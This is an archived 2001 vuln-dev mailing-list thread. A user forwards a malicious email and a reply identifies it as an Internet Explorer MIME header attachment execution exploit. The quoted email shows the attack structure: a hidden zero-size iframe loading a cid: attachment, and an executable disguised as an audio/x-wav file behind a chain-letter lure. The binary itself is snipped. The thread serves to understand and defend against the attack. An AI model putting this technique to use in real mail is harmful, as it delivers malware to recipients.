Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

RE: A very dangerous mail...

From: Aidan O'Kelly <okelly () xnet ie>
Date: Mon, 23 Jul 2001 15:42:40 +0100

'Microsoft IE MIME Header Attachment Execution Vulnerability'
It was discovered a couple months ago. If it was an exe it would have run,
although since it asked you wheter you want to save it or run it, it means
your system is patched anyway.

Explanation and example.

http://www.kriptopolis.com/cua/eml.html




-----Original Message-----
From: Marius Huse Jacobsen [mailto:mahuja () c2i net]
Sent: 20 July 2001 22:24
To: vuln-dev () securityfocus com
Subject: A very dangerous mail...


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Edited to protect any innocents.
Obvious forgery (supposedly from microsoft.com)
I'm using ZoneAlarm MailSafe -> .exe changed to .zl9
It tries to start the attachment exe automatically (Outlook Express)
- - it asks me if I want to save or start the zl9 file but I 
don't know
what it would do to an exe.

Exactly how bad is it? The offending line seems to be
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>

Html email was a curse to begin with and it hasn't become any better.
Can anyone give me that ascii ribbon sig?


8< --------- Start offending letter -----------
Return-Path: <zina () somewhereonthenet com>
Received: from smtp08.somewhereonthenet.com
(smtp08.somewhereonthenet.com [196.*.*.*])
 by mail.my_isp.com (8.9.3/8.9.3) with ESMTP id PAA16304
 for <my () mail addy>; Sat, 14 Jul 2001 15:10:00 +0200 (MET DST)
Received: from microsoft.com ([196.*.*.*])
 by smtp08.somewhereonthenet.com (Sun Internet Mail Server
sims.3.5.2000.03.23.18.03.p10)
 with SMTP id <0GGG009BGSJHYE () smtp08 iafrica com> for my () mail addy;
Sat,
 14 Jul 2001 15:09:40 +0200 (SAT)
Date: Sat, 14 Jul 2001 15:09:01 +0100
From: Lynda () smtp08 somewhereonthenet com
Subject: Fw: 100,000 lemmings can't be ...
To: removed () smtp08 somewhereonthenet com
Message-id: <0GGG009BISJHYE () smtp08 somewhereonthenet com>
MIME-version: 1.0
Content-type: multipart/mixed; boundary="nymph"

This is a multi-part message in MIME format.

- --nymph
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
<P align=center><FONT size=7><SPAN
class=590014113-13042001>SMACK!!!</SPAN></FONT></P>
<P align=center><FONT size=7><SPAN class=590014113-13042001>You have
been
hit</SPAN></FONT></P>
<P align=center><SPAN class=590014113-13042001>This is the
funny-attachment war!
You have just been hit and by the rule book you can't hit this person
back. To
be in the game you need to send this message to five of your friends,
try to
find some small and funny attachment to send along. If you don't have
time use
the one you got hit by, go ahead hit someone!</SPAN></P>
<P align=center><FONT size=7><SPAN
class=590014113-13042001></SPAN></FONT>&nbsp;</P></BODY></HTML>

- --nymph
Content-Type: audio/x-wav;
        name="setup.zl9"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

<snip .exe content>

- --nymph
<snip fortune.zip>

- --nymph--


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4

iQA/AwUBO1ihZUcYTo91XF1EEQImJgCg5UccaNK/H1g27tAzUm23TayOfpQAnjDk
sqjAlFfiJIKdd21U6wxArNXb
=63JI
-----END PGP SIGNATURE-----







_________________________________________
Aidan O'Kelly
Systems Administrator      okelly () xnet ie

Xnet - The Data Storage People
Dublin: +353 (1) 2740 100
Belfast: +44(28) 9073 5872
www.xnet.ie | storage () xnet ie

*******************************************************************
 Privileged/Confidential Information may be contained in this
 message. If you are not the addressee indicated in this message
 (or responsible for delivery of the message to such person), you
 may not copy or deliver this message to anyone. In such case,
 you should destroy this message and kindly notify the sender by
 reply email. Please advise immediately if you or your employer do
 not consent to Internet email for messages of this kind. Opinions,
 conclusions and other information in this message that do not relate
 to the official business of Xnet and shall be understood as
 neither given nor endorsed by it.
 ********************************************************************
Previous By Date Next
Previous By Thread Next

Current thread: